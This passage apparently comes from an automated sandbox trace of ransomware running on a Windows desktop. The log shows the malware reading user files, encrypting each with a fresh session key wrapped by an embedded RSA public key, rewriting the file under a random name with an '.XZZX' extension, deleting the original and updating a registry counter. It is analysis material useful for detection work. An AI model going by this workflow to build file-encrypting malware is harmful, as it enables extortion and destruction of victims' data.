returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0164.075] SetErrorMode (uMode=0x1) returned 0x1 [0164.075] lstrcpyW (in: lpString1=0x29af860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0164.075] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x1fc79588, Data2=0x4175, Data3=0x4826, Data4=([0]=0x9b, [1]=0x72, [2]=0xd5, [3]=0xfe, [4]=0x28, [5]=0xbf, [6]=0x55, [7]=0x87))) returned 0x0 [0164.075] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned 53 [0164.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0164.075] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\332EDF2812729F5E1FC79588150D83A6.XZZX") returned 79 [0164.075] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0164.075] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini", dwFileAttributes=0x20) returned 1 [0164.078] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0164.079] ReadFile (in: hFile=0x1b4, lpBuffer=0x43d3390, nNumberOfBytesToRead=0x11a, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43d3390*, lpNumberOfBytesRead=0x29ae418*=0x11a, lpOverlapped=0x0) returned 1 [0164.079] CloseHandle (hObject=0x1b4) returned 1 [0164.079] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0164.080] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0164.080] SetErrorMode (uMode=0x1) returned 0x1 [0164.080] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0164.080] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc1870) returned 1 [0164.082] CryptGenKey (in: hProv=0x3cc1870, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x4372538) returned 1 [0164.184] CryptExportKey (in: hKey=0x4372538, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0164.184] CryptExportKey (in: hKey=0x4372538, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0164.184] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0164.184] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0164.184] CryptDestroyKey (hKey=0x4372538) returned 1 [0164.184] CryptReleaseContext (hProv=0x3cc1870, dwFlags=0x0) returned 1 [0164.184] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\332EDF2812729F5E1FC79588150D83A6.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\332edf2812729f5e1fc79588150d83a6.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0164.185] WriteFile (in: hFile=0x1b4, lpBuffer=0x43d3390*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43d3390*, lpNumberOfBytesWritten=0x29ae438*=0x11a, lpOverlapped=0x0) returned 1 [0164.185] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11a [0164.185] WriteFile (in: hFile=0x1b4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0164.186] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11f [0164.186] WriteFile (in: hFile=0x1b4, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x16, lpOverlapped=0x0) returned 1 [0164.186] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x135 [0164.186] WriteFile (in: hFile=0x1b4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0164.186] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x13a [0164.186] SetErrorMode (uMode=0x1) returned 0x1 [0164.186] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0164.186] OutputDebugStringW (lpOutputString="end") [0164.186] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0164.186] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0164.186] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x3cc1870) returned 1 [0164.187] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc1870, dwCertEncodingType=0x1, pInfo=0x437e528*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437e558*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437e560*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x4372638) returned 1 [0164.187] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0164.187] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0164.187] CryptEncrypt (in: hKey=0x4372638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0164.187] CryptEncrypt (in: hKey=0x4372638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc18f8*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc18f8*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0164.188] WriteFile (in: hFile=0x1b4, lpBuffer=0x3cc18f8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x3cc18f8*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0164.188] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0164.188] WriteFile (in: hFile=0x1b4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0164.188] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0164.188] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0164.188] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x1ac) returned 0x0 [0164.188] RegQueryValueExW (in: hKey=0x1ac, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0xe1, lpcbData=0x29adfdc*=0x4) returned 0x0 [0164.188] RegCloseKey (hKey=0x1ac) returned 0x0 [0164.188] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x1ac) returned 0x0 [0164.188] RegSetValueExW (in: hKey=0x1ac, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0xe2, cbData=0x4 | out: lpData=0x29adfec*=0xe2) returned 0x0 [0164.188] RegCloseKey (hKey=0x1ac) returned 0x0 [0164.189] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0164.189] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0164.189] CloseHandle (hObject=0x1b4) returned 1 [0164.189] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0164.190] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0164.190] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini")) returned 1 [0164.192] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini")) returned 0 Thread: id = 551 os_tid = 0x448 [0164.228] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0164.228] lstrcpyW (in: lpString1=0x29af460, lpString2="FNPUDpYy3rwMi.flv" | out: lpString1="FNPUDpYy3rwMi.flv") returned="FNPUDpYy3rwMi.flv" [0164.228] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0164.228] SetErrorMode (uMode=0x1) returned 0x1 [0164.228] lstrcpyW (in: lpString1=0x29af860, lpString2="FNPUDpYy3rwMi.flv" | out: lpString1="FNPUDpYy3rwMi.flv") returned="FNPUDpYy3rwMi.flv" [0164.229] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xc02623d, Data2=0x411b, Data3=0x467d, Data4=([0]=0x85, [1]=0x70, [2]=0x82, [3]=0xd2, [4]=0xd2, [5]=0x30, [6]=0xac, [7]=0xd7))) returned 0x0 [0164.229] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FNPUDpYy3rwMi.flv") returned 59 [0164.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0164.229] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DF31D96F11ED2C2F0C02623D14881077.XZZX") returned 79 [0164.229] StrStrW (lpFirst="FNPUDpYy3rwMi.flv", lpSrch="XZZX") returned 0x0 [0164.229] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FNPUDpYy3rwMi.flv", dwFileAttributes=0x20) returned 1 [0164.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FNPUDpYy3rwMi.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fnpudpyy3rwmi.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0164.230] ReadFile (in: hFile=0x1a0, lpBuffer=0x43a2bd8, nNumberOfBytesToRead=0xd3af, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43a2bd8*, lpNumberOfBytesRead=0x29ae418*=0xd3af, lpOverlapped=0x0) returned 1 [0164.232] CloseHandle (hObject=0x1a0) returned 1 [0164.232] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0164.233] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0164.233] SetErrorMode (uMode=0x1) returned 0x1 [0164.233] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0164.233] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc1980) returned 1 [0164.236] CryptGenKey (in: hProv=0x3cc1980, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x4372538) returned 1 [0164.446] CryptExportKey (in: hKey=0x4372538, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0164.446] CryptExportKey (in: hKey=0x4372538, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0164.447] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0164.447] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0164.447] CryptDestroyKey (hKey=0x4372538) returned 1 [0164.447] CryptReleaseContext (hProv=0x3cc1980, dwFlags=0x0) returned 1 [0164.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DF31D96F11ED2C2F0C02623D14881077.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\df31d96f11ed2c2f0c02623d14881077.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x22c [0164.448] WriteFile (in: hFile=0x22c, lpBuffer=0x43a2bd8*, nNumberOfBytesToWrite=0xd3af, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43a2bd8*, lpNumberOfBytesWritten=0x29ae438*=0xd3af, lpOverlapped=0x0) returned 1 [0164.449] SetFilePointer (in: hFile=0x22c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd3af [0164.449] WriteFile (in: hFile=0x22c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0164.449] SetFilePointer (in: hFile=0x22c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd3b4 [0164.450] WriteFile (in: hFile=0x22c, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x22, lpOverlapped=0x0) returned 1 [0164.450] SetFilePointer (in: hFile=0x22c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd3d6 [0164.450] WriteFile (in: hFile=0x22c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0164.450] SetFilePointer (in: hFile=0x22c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd3db [0164.450] SetErrorMode (uMode=0x1) returned 0x1 [0164.450] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0164.450] OutputDebugStringW (lpOutputString="end") [0164.450] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0164.450] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0164.450] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x3cc1980) returned 1 [0164.451] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc1980, dwCertEncodingType=0x1, pInfo=0x437e5f8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437e628*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437e630*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x4372678) returned 1 [0164.451] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0164.451] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0164.452] CryptEncrypt (in: hKey=0x4372678, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0164.452] CryptEncrypt (in: hKey=0x4372678, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc1a08*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc1a08*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0164.452] WriteFile (in: hFile=0x22c, lpBuffer=0x3cc1a08*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x3cc1a08*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0164.452] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0164.452] WriteFile (in: hFile=0x22c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0164.452] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0164.452] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0164.452] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x230) returned 0x0 [0164.452] RegQueryValueExW (in: hKey=0x230, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0xe2, lpcbData=0x29adfdc*=0x4) returned 0x0 [0164.452] RegCloseKey (hKey=0x230) returned 0x0 [0164.452] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x230) returned 0x0 [0164.452] RegSetValueExW (in: hKey=0x230, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0xe3, cbData=0x4 | out: lpData=0x29adfec*=0xe3) returned 0x0 [0164.453] RegCloseKey (hKey=0x230) returned 0x0 [0164.453] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0164.453] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0164.453] CloseHandle (hObject=0x22c) returned 1 [0164.453] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0164.454] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0164.454] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FNPUDpYy3rwMi.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fnpudpyy3rwmi.flv")) returned 1 [0164.455] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FNPUDpYy3rwMi.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fnpudpyy3rwmi.flv")) returned 0 Thread: id = 552 os_tid = 0x7f4 [0164.456] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0164.456] lstrcpyW (in: lpString1=0x2aaf460, lpString2="FzoKie.rtf" | out: lpString1="FzoKie.rtf") returned="FzoKie.rtf" [0164.456] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: 